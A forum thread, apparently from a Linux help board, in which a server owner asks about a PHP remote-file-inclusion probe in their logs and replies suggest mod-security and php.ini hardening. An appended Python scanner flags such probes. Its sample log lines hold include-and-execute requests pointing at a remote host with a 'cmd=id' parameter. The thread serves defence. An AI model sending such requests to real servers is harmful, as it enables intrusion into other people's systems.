Correct me if I'm wrong, but I believe they are trying to copy a file "cm" to my computer, overwrite index.php, and remove any evidence. Then they are emailing info about my system to a couple yahoo email addresses.
This command is repeated for a bunch of sub-directories all looking for index.php.
None of the subdirectories they looked for exist, and there is no index.php in the main directory, so I don't think any files were overwritten.
There is nothing important on this computer, so if I have been compromised, re-installing is not a problem, but I would rather learn from this and tighten security, and try to track down anything else that may have happened.
So I have a few questions. Some of these might be very simple.
How can I disable mail so they could not email themselves?
Was something actually executed on my computer?
Any links for how php can be exploited to let a command be executed on a remote computer?
What settings should I change for php, mysql, or apache to help stop these exploits?
The 404 indicates that the vulnerable application (mambo) is not installed on your system. Interestingly, you can get the hacker's email addresses (two yahoo accounts) from the data they sent you. I doubt you'd be able to get anything done, however.
The gentleman (caca) is well known to me. My suggestion is to look at implementing mod-security and the common rules on your apache server if you are using php based apps. There are also modifications that should be made to php.ini such as turning globals off. You can view the code for the exploit by using the address before the "&cmd". He isn't trying to upload the app to your system. The code from this page is probing your system to find weaknesses in your system security.
Whilst there may not be anything important on your server you might find that your system is "acquired" by a hacker and applications such as IRC software are installed and a group then starts using your system as a meeting place. The most important thing is to ensure that he doesn't get access to /.
How would someone be able to gain access to / since apache's root directory is /var/www ?
There are certain scripts around such as r57 which will enable the hacker to explore your whole file system if you have any vulnerable php applications on your site. I have personal experience of this. It is then possible for them, using the same tool, to upload files to your server under the ownership of your apache user (www-data or nobody). Take a look at two screen captures of this tool in action before I implemented mod-security on my server, with a vulnerable app, here and here.
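As an added example (not code from this thread or from mod-security), here is a small Python scanner for Apache access logs that flags the request pattern discussed above: a query parameter carrying a remote URL (the address before the "&cmd") plus a cmd-style parameter, and reports the status code so a 404 can be read as "script not present" as noted in the replies. The log lines, IP addresses, and parameter names are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in Apache combined log format (not from the thread).
# The first two mimic an include-and-execute probe against index.php in several
# directories; the third is an ordinary request.
SAMPLE_LOG = """\
203.0.113.7 - - [12/May/2007:03:14:07 +0000] "GET /index.php?option=com_test&path=http://192.0.2.5/cm.txt?&cmd=id HTTP/1.1" 404 294 "-" "Mozilla/4.0"
203.0.113.7 - - [12/May/2007:03:14:08 +0000] "GET /mambo/index.php?option=com_test&path=http://192.0.2.5/cm.txt?&cmd=id HTTP/1.1" 404 294 "-" "Mozilla/4.0"
198.51.100.3 - - [12/May/2007:03:20:11 +0000] "GET /about.php?page=team HTTP/1.1" 200 1523 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)
REMOTE_RE = re.compile(r'^(https?|ftp)://', re.IGNORECASE)
CMD_PARAMS = {"cmd", "command", "exec"}  # assumed names worth flagging


def classify_request(url):
    """Return the reasons a request looks like a remote-include probe, or [] if clean."""
    reasons = []
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if REMOTE_RE.match(value):
            reasons.append(f"remote URL in parameter '{name}'")
        if name.lower() in CMD_PARAMS:
            reasons.append(f"command parameter '{name}'={value!r}")
    return reasons


def scan_log(text):
    """Parse each log line and keep those whose request URL is flagged."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed or non-matching line, skip it
        reasons = classify_request(m["url"])
        if reasons:
            hits.append({"ip": m["ip"], "path": urlsplit(m["url"]).path,
                         "status": int(m["status"]), "reasons": reasons})
    return hits


if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        served = "script missing (404)" if h["status"] == 404 else f"status {h['status']}"
        print(f"{h['ip']} {h['path']} -> {served}: {'; '.join(h['reasons'])}")
```

Run it against a real access log by replacing SAMPLE_LOG with the file contents; a flagged request that returned 200 rather than 404 is the one that deserves a closer look.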